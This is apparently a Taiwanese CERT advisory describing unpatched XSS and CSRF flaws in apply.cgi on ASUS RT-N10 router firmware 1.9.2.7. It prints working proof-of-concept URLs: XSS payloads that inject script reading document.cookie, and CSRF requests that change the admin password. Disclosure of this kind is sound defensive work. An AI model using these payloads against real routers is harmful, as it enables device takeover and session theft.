按 Enter 到主內容區
:::

TWCERT-電子報

:::
發布日期:
字型大小:

華碩RT-N10路由器正面臨XSS及CSRF威脅

CVE編號 暫無
影響產品 RT-N10 firmware 1.9.2.7
解決辦法
張貼日 2018-02-07
上稿單位 TWCERT/CC

●概述:
來自烏克蘭websecurity網站披露,ASUS RT-N10系列四款無線路由器韌體存在輸入驗證漏洞,駭客針對apply.cgi設計URL,能對參數current_page、next_host注入code而形成Cross-Site Scripting,亦可對action_mode實施Cross-Site Request Forgery而修改管理者密碼,接管設備控制權,是否其他型號韌體具類似風險則尚待查證,此際華碩仍無修補聲明。
●編註:
在RT-N10、RT-N10E、RT-N10LX、RT-N10U四款無線路由器上,凡搭配韌體1.9.2.7版,均有web輸入驗證缺陷,關鍵在於apply.cgi,該通用閘道介面未完善過濾遠端使用者鍵入之URL字串,讓惡意HTML程式在受害網頁端執行,攻擊者最終得以假冒受害用戶身分操縱站台,據烏克蘭某網路安全網站所示,目前有兩類攻擊態樣,10.10.10.10係假定路由器IP。
(1)跨站腳本攻擊,針對current_page、next_host二參數注入指令:
http://10.10.10.10/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
http://10.10.10.10/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
(2)跨站請求偽冒攻擊範例,修改admin帳號之密碼:
http://10.10.10.10/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save
http://10.10.10.10/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart

回頁首